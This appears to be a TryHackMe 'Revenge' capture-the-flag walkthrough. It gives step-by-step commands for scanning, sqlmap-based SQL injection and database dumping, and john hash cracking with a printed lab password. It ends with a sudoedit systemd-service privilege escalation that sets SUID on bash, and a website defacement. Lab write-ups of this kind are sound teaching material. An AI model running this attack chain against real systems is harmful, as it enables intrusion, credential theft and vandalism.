Revenge — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Revenge — TryHackMe — WriteUp. Check it out!
First, let’s download Billy’s message.
Well looks like he wants me to deface the website! Next up, deploy the machine and nmap for opened ports.
nmap -A -T4 -p- -v <ip>
There are 2 ports opened: 22 (SSH) and 80 (HTTP). First, let’s access the website.
I’ve checked the page source (Ctrl + U), but nothing valuable. Next, find hidden dirs and files using gobuster:
gobuster dir -u http://<ip>:80/ -w /path-to-wordlist
Let’s access /login:
and /admin:
Ok so there are 2 login pages: for customer and for admin. But I haven’t got any credential yet.
Look at the description:
Ok so I’ll use sqlmap to look for SQLi on this website:
sqlmap -u http://<ip>:80/products/1 — batch — current-db
**Why /products/1? Because it’s where the website will load the products from database and display in the website.
After a while, I’ve got the database name: “duckyinc”. Follow the database name to look for tables inside it:
sqlmap -u http://<ip>/products/1 — batch -D duckyinc — tables
And yes, I’ve found 3 tables inside “duckyinc” database. Let’s dump everything from that 3 tables:
sqlmap -u http://<ip>/products/1 — batch -D duckyinc — dump
Focus on the “user” table, you will see your 1st flag:
Now for the “system_user” table:
I’ve found credential of the server-admin. Let’s crack that hash password using john. It’s a Bcrypt hash. I will copy the hash password to a text file called “server_admin.txt”.
john — wordlist=rockyou.txt server_admin.txt
The password has been cracked! Let’s login at /admin using the credential:
server-admin : inuyasha
However, I cannot login! So what’s this password for? Let’s try SSH:
ssh server-admin@<ip>
Enter the password:
And that’s it! Now I’m into the machine. Find the flag:
Now I’ll find a way to own root to get the 3rd flag. First, sudo -l to see if server-admin can run sudo:
Because server-admin can edit the duckyinc.service, I will modify this service to get root:
sudoedit /etc/systemd/system/duckyinc.service
This is the original duckyinc.service
This is the modified duckyinc.service.
So what the service does is that it will give /bin/bash SUID bit set. Save the file and then:
sudo systemctl daemon-reload
sudo systemctl restart duckyinc.service
Then:
/bin/bash -p
Now I’m root! Let’s cd root and see what’s inside:
Well there’s no flag here. So I need to deface the website to get the final flag.
First:
cd /var/www/duckyinc/templates
Then edit the “index.html”:
After that, cd to /root and you will see flag3:
The end.
HAPPY HACKING